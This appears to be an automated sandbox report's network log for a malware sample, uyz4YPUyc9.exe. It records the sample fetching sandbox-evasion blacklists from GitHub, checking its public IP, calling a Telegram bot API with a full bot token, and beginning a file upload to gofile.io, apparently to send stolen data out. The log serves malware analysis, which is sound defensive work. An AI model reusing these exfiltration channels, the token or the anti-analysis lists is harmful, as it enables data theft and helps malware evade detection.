Nov 29, 2024 12:28:14.550409079 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:14 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=r18.59o3y4a32NZ69ixnPzAEhA_Smfs9TsiZJpYXXyg-1732879694-1.0.1.1-U4jQOjBGTtSABLsuzkLuuId9dI7pvwQLJdc6_dWyRUpt295wfdf9etxzmHVbcwaE7tfD0eFj0rtIEUDzL5Aq8w; path=/; expires=Fri, 29-Nov-24 11:58:14 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ea240c9d88e423d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49723	104.16.184.241	80	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 12:28:20.263336897 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Nov 29, 2024 12:28:21.355782032 CET	535	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 11:28:21 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=21OSRnPQBiHchdvyU9qOM0d.Hvp9zxOLYE4NKz6npeM-1732879701-1.0.1.1-9cU2UqY5iPRvIfg3kcOjshdt6YTgaW0B7Ph9yfOYX1mIaqIrG4d0XnhBpRQJlGRPzQWWaTIuGx1aW0AxLG8_Dg; path=/; expires=Fri, 29-Nov-24 11:58:21 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ea240f46bff6a5c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38 0a Data Ascii: 8.46.123.228

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	185.199.108.133	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:06 UTC	126	OUT	GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:28:06 UTC	896	IN	HTTP/1.1 200 OK Connection: close Content-Length: 31 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: F0F4:35108B:983CD:A6B92:67498FF6 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:28:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740053-EWR X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1732879687.509230,VS0,VE124 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 88585687326dfeffdf1dc47b85d893b308870d2e Expires: Fri, 29 Nov 2024 11:33:06 GMT Source-Age: 0
2024-11-29 11:28:06 UTC	31	IN	Data Raw: 56 6d 52 65 6d 6f 74 65 47 75 65 73 74 2e 65 78 65 0a 53 79 73 6d 6f 6e 36 34 2e 65 78 65 0a Data Ascii: VmRemoteGuest.exeSysmon64.exe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	185.199.108.133	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:06 UTC	119	OUT	GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:28:06 UTC	898	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2853 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: DDA6:287308:A00E2:AE8A6:67498FF6 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:28:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740057-EWR X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1732879686.457114,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: ef62d795b42dd286f38ab079a2337f8aabf1c5ca Expires: Fri, 29 Nov 2024 11:33:06 GMT Source-Age: 172
2024-11-29 11:28:06 UTC	1378	IN	Data Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31 Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
2024-11-29 11:28:06 UTC	1378	IN	Data Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34 Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
2024-11-29 11:28:06 UTC	97	IN	Data Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	185.199.108.133	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:06 UTC	128	OUT	GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:28:06 UTC	897	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1275 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: E854:128C4E:AEAFA:BD2CE:67498FF8 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:28:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740041-EWR X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1732879687.518816,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 81458267afc42be44d3b6a85864cb68a5af0c58f Expires: Fri, 29 Nov 2024 11:33:06 GMT Source-Age: 76
2024-11-29 11:28:06 UTC	1275	IN	Data Raw: 30 35 68 30 30 47 69 30 0a 30 35 4b 76 41 55 51 4b 50 51 0a 32 31 7a 4c 75 63 55 6e 66 49 38 35 0a 33 75 32 76 39 6d 38 0a 34 33 42 79 34 0a 34 74 67 69 69 7a 73 4c 69 6d 53 0a 35 73 49 42 4b 0a 35 59 33 79 37 33 0a 67 72 65 70 65 74 65 0a 36 34 46 32 74 4b 49 71 4f 35 0a 36 4f 34 4b 79 48 68 4a 58 42 69 52 0a 37 44 42 67 64 78 75 0a 37 77 6a 6c 47 58 37 50 6a 6c 57 34 0a 38 4c 6e 66 41 61 69 39 51 64 4a 52 0a 38 4e 6c 30 43 6f 6c 4e 51 35 62 71 0a 38 56 69 7a 53 4d 0a 39 79 6a 43 50 73 45 59 49 4d 48 0a 41 62 62 79 0a 61 63 6f 78 0a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 0a 41 6d 79 0a 61 6e 64 72 65 61 0a 41 70 70 4f 6e 46 6c 79 53 75 70 70 6f 72 74 0a 41 53 50 4e 45 54 0a 61 7a 75 72 65 0a 62 61 72 62 61 72 72 61 79 0a 62 65 6e 6a 61 68 0a 42 72 75 6e Data Ascii: 05h00Gi005KvAUQKPQ21zLucUnfI853u2v9m843By44tgiizsLimS5sIBK5Y3y73grepete64F2tKIqO56O4KyHhJXBiR7DBgdxu7wjlGX7PjlW48LnfAai9QdJR8Nl0ColNQ5bq8VizSM9yjCPsEYIMHAbbyacoxAdministratorAmyandreaAppOnFlySupportASPNETazurebarbarraybenjahBrun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49709	185.199.108.133	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:06 UTC	123	OUT	GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:28:06 UTC	896	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1110 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: AD0E:370AE7:92613:A0DDF:67498FF8 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:28:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740026-EWR X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1732879686.457239,VS0,VE7 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 3fcb365804b0963953e179504261b93dc487d1b7 Expires: Fri, 29 Nov 2024 11:33:06 GMT Source-Age: 0
2024-11-29 11:28:06 UTC	1110	IN	Data Raw: 30 38 31 61 62 33 39 35 2d 35 65 38 35 2d 34 36 33 34 2d 61 63 64 62 2d 32 64 62 64 34 66 35 39 61 37 64 30 0a 30 38 39 65 36 32 31 63 2d 31 34 32 32 2d 34 38 35 36 2d 61 38 62 31 2d 33 66 31 64 62 32 30 38 63 65 39 65 0a 31 30 37 39 37 66 31 64 2d 39 36 31 33 2d 34 38 33 32 2d 62 31 61 33 2d 63 32 32 66 65 33 36 35 62 38 39 64 0a 31 35 39 34 37 38 30 32 2d 63 62 39 63 2d 34 37 38 66 2d 61 66 35 63 2d 33 33 62 31 61 62 62 64 31 62 66 65 0a 31 61 38 35 63 36 36 30 2d 31 66 39 38 2d 34 32 63 61 2d 62 31 63 62 2d 31 39 39 66 36 33 65 31 64 38 30 37 0a 32 62 35 33 36 35 66 31 2d 65 65 62 62 2d 34 31 33 35 2d 62 36 65 31 2d 34 31 33 61 61 62 32 39 39 66 63 62 0a 34 35 30 38 61 66 64 33 2d 35 66 30 35 2d 34 39 31 65 2d 62 34 39 66 2d 62 34 34 30 32 34 39 36 37 Data Ascii: 081ab395-5e85-4634-acdb-2dbd4f59a7d0089e621c-1422-4856-a8b1-3f1db208ce9e10797f1d-9613-4832-b1a3-c22fe365b89d15947802-cb9c-478f-af5c-33b1abbd1bfe1a85c660-1f98-42ca-b1cb-199f63e1d8072b5365f1-eebb-4135-b6e1-413aab299fcb4508afd3-5f05-491e-b49f-b44024967

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49704	185.199.108.133	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:06 UTC	120	OUT	GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:28:06 UTC	898	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1246 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 7E09:1CF27F:96EA1:A565C:67498FF6 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:28:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740040-EWR X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1732879687.559031,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 776790ebf0304109d12d46721eb4c5ea1155d061 Expires: Fri, 29 Nov 2024 11:33:06 GMT Source-Age: 172
2024-11-29 11:28:06 UTC	1246	IN	Data Raw: 32 39 5f 5f 48 45 52 45 0a 32 47 36 43 37 5a 36 31 0a 32 52 4f 5f 38 55 56 55 0a 32 53 4e 35 33 38 4b 34 0a 35 4b 42 4b 34 31 5f 4c 0a 35 4c 58 50 41 38 45 53 0a 35 50 45 43 4e 36 4c 31 0a 35 52 50 46 54 33 48 5a 0a 36 42 4f 53 34 4f 37 55 0a 36 42 5a 50 32 59 32 5f 0a 36 46 34 34 41 44 52 37 0a 36 4d 50 41 39 33 0a 37 32 32 39 48 39 47 39 0a 37 34 5a 5a 43 59 37 41 0a 37 54 42 39 47 36 50 37 0a 38 34 4b 44 31 4b 53 4b 0a 38 4e 59 47 4b 33 46 4c 0a 38 59 33 42 53 58 4b 47 0a 39 53 46 37 32 46 47 37 0a 39 5a 37 37 44 4e 34 54 0a 5f 47 33 31 45 34 36 4e 0a 5f 50 48 4c 4e 59 47 52 0a 5f 54 39 57 35 4c 48 4f 0a 41 46 52 42 52 36 54 43 0a 41 4d 44 20 52 61 64 65 6f 6e 20 48 44 20 38 36 35 30 47 0a 41 53 50 45 45 44 20 47 72 61 70 68 69 63 73 20 46 61 6d 69 6c Data Ascii: 29__HERE2G6C7Z612RO_8UVU2SN538K45KBK41_L5LXPA8ES5PECN6L15RPFT3HZ6BOS4O7U6BZP2Y2_6F44ADR76MPA937229H9G974ZZCY7A7TB9G6P784KD1KSK8NYGK3FL8Y3BSXKG9SF72FG79Z77DN4T_G31E46N_PHLNYGR_T9W5LHOAFRBR6TCAMD Radeon HD 8650GASPEED Graphics Famil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49705	185.199.108.133	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:06 UTC	124	OUT	GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-11-29 11:28:06 UTC	897	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3145 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 1C9C:194CD0:60A15:6E989:67498FF6 Accept-Ranges: bytes Date: Fri, 29 Nov 2024 11:28:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740078-EWR X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1732879687.559810,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 95d0dba1f3bfe039528384c887a10fc9ffccc50b Expires: Fri, 29 Nov 2024 11:33:06 GMT Source-Age: 78
2024-11-29 11:28:06 UTC	1378	IN	Data Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50 Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
2024-11-29 11:28:06 UTC	1378	IN	Data Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46 Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
2024-11-29 11:28:06 UTC	389	IN	Data Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	149.154.167.220	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:08 UTC	121	OUT	GET /bot7835902596:AAE7O-d140OI9k-WT0yvfBY49dp9A3u6EvY/getMe HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-29 11:28:09 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 29 Nov 2024 11:28:09 GMT Content-Type: application/json Content-Length: 248 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-29 11:28:09 UTC	248	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 37 38 33 35 39 30 32 35 39 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 74 65 6c 74 69 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 74 65 6c 74 69 6b 5f 62 6f 74 22 2c 22 63 61 6e 5f 6a 6f 69 6e 5f 67 72 6f 75 70 73 22 3a 74 72 75 65 2c 22 63 61 6e 5f 72 65 61 64 5f 61 6c 6c 5f 67 72 6f 75 70 5f 6d 65 73 73 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 73 75 70 70 6f 72 74 73 5f 69 6e 6c 69 6e 65 5f 71 75 65 72 69 65 73 22 3a 66 61 6c 73 65 2c 22 63 61 6e 5f 63 6f 6e 6e 65 63 74 5f 74 6f 5f 62 75 73 69 6e 65 73 73 22 3a 66 61 6c 73 65 2c 22 68 61 73 5f 6d 61 69 6e 5f 77 65 62 5f 61 70 70 22 3a 66 61 6c 73 65 7d 7d Data Ascii: {"ok":true,"result":{"id":7835902596,"is_bot":true,"first_name":"steltik","username":"steltik_bot","can_join_groups":true,"can_read_all_group_messages":false,"supports_inline_queries":false,"can_connect_to_business":false,"has_main_web_app":false}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49713	45.112.123.126	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:15 UTC	70	OUT	GET /servers HTTP/1.1 Host: api.gofile.io Connection: Keep-Alive
2024-11-29 11:28:15 UTC	1116	IN	HTTP/1.1 200 OK Server: nginx/1.27.1 Date: Fri, 29 Nov 2024 11:28:15 GMT Content-Type: application/json; charset=utf-8 Content-Length: 387 Connection: close Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Content-Type, Authorization Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD Access-Control-Allow-Credentials: true Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Origin-Agent-Cluster: ?1 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=15552000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 0 ETag: W/"183-wNlqn4/ZImnlRAWZLMqUSF8Oh/k"
2024-11-29 11:28:15 UTC	387	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 61 74 61 22 3a 7b 22 73 65 72 76 65 72 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 35 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 32 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 31 30 22 2c 22 7a 6f 6e 65 22 3a 22 65 75 22 7d 5d 2c 22 73 65 72 76 65 72 73 41 6c 6c 5a 6f 6e 65 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 33 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 39 22 2c 22 7a 6f 6e 65 22 3a 22 6e 61 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 73 74 6f 72 65 38 22 2c 22 7a 6f 6e Data Ascii: {"status":"ok","data":{"servers":[{"name":"store5","zone":"eu"},{"name":"store1","zone":"eu"},{"name":"store2","zone":"eu"},{"name":"store10","zone":"eu"}],"serversAllZone":[{"name":"store3","zone":"na"},{"name":"store9","zone":"na"},{"name":"store8","zon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49714	31.14.70.244	443	5276	C:\Users\user\Desktop\uyz4YPUyc9.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-29 11:28:17 UTC	207	OUT	POST /uploadfile HTTP/1.1 Content-Type: multipart/form-data; boundary="5829e05e-a172-4b44-aff6-61726419cf46" Host: store5.gofile.io Content-Length: 118541 Expect: 100-continue Connection: Keep-Alive
